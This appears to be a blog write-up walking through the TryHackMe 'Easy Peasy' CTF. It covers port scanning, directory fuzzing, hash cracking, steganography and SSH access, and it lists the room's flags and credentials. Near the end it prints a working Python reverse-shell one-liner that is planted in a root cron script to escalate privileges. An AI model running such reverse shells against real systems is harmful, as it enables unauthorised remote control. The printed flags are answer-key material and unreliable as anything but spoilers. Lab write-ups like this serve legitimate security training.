Hello hackers! Today we are going to another ctf from tryhackme. This one is Easy Peasy which is developed by kral4.
Now, let’s start our enumeration using nmap.
Always try to do a full port scan you might miss open ports. Here we have 2 ports open for http and one port for ssh. In total we have 3 ports that’s our first answer. We can see the version of nginx which is our second answer 1.61.1. Now in the third question they asked what’s running on the highest port and it’s Apache.
Now let’s check both http services hah! Nothing that much interesting on homepage. Time to fuzz web directories for that i use gobuster. It can be installed by github repo and if you are using kali linux you can install that application using following commands:
sudo apt update
sudo apt install gobuster
Now let’s fuzz on port 80!
We found a hidden directory here when we visit that page we see a background image nothing interesting let’s keep fuzzing.
We see another photo but when we see the page source code we see a hidden text which is encoded in base64.
<p hidden>ZmxhZ3tmMXJzN19mbDRnfQ==</p>
we can decode this on terminal by using following command:
root@kali:~/Downloads# echo “ZmxhZ3tmMXJzN19mbDRnfQ==” | base64 -d
flag{f1rs7_fl4g}
That was our first flag guys now let’s enumerate our another http service which is running at port 65524. Going to the Apache server webpage it looks like default apache webpage but when you scroll down you will see flag3.
Fl4g 3 : flag{9fdafbd64c47471a8f54cd3fc64cd312}
After that i ran gobuster in apache server. i found following results:
I see a robots.txt file on web page. so what it does is communicates with web crawlers which contains your site data in the search engine and robots.txt tells the web crawlers which dir to crawl and which is not to crawl. Let’s check it out.
User-Agent:a18672860d0510e5ab6699730763b250
value of User-Agent looks like a hash. let’s check if it is or not using https://hashes.com/en/tools/hash_identifier. Yes, it’s a md5 hash. Now let’s crack it. I used online site https://md5hashing.net/hash/md5/a18672860d0510e5ab6699730763b250 which is great.
flag2: flag{1m_s3c0nd_fl4g}
Now let’s check our apache server’s source code there i see a cipher it’s hidden:
<p hidden>its encoded with ba….:ObsJmP173N2X6dOrAgEAL0Vu</p>
let’s use CyberChef to crack it:
Which is our hidden directory and answer to the hidden directory question. Let’s navigate there. Looking at the souce code we see a long hash and a jpg image. let’ download image and copy that hash. I used john and provided password list easypeasy.txt to crack that hash you can use online tools or hashcat or john you will get the same answer:
Password: mypasswordforthatjob
Let’s check our jpg image file if it stores data or not using steghide. You can install steghide on kali liux using following commands:
sudo apt install steghide
Now, let’s check our secert text.
Password is encoded using binary again we can use CyberChef to decode this.
Decrypted username and password is:
boring : iconvertedmypasswordtobinary
ssh? sure, let’s do it.
ssh boring@10.10.29.155 -p6498
enter pass from above and we got our ssh connection. let’s search for flags.
we saw user.txt on our default directory and when we open that file. it says data is rotated or something. That might means it is using ROT cipher let’s decrypt it using CyberChef. And we got our flag.
user.txt: flag{n0wits33msn0rm4l}
Now at last privilege escalation. let’s start with sudo -l didn’t get anything. Next crontabs.
* * * * * root cd /var/www/ && sudo bash .mysecretcronjob.sh
i used locate and found where is that script.
That script is owned by our user means we can modify it. let’s put a reverse shell there from pentestmonkey. I used python script you can use bash too but you have to modify python script from pentest alittle bit. Change your ip and port. start a listener using netcat and wait for the connection.
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<your_ip>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
locate root.txt. it’s hidden in /root/.root.txt
.root.txt: flag{63a9f0ea7bb98050796b649e85481845}
With that we have successfully completed our easypeasy ctf. Thank you everyone for reading this a follow me on twitter if you have any queries and want to do ctf. noobsixt9.
Keep hacking!!
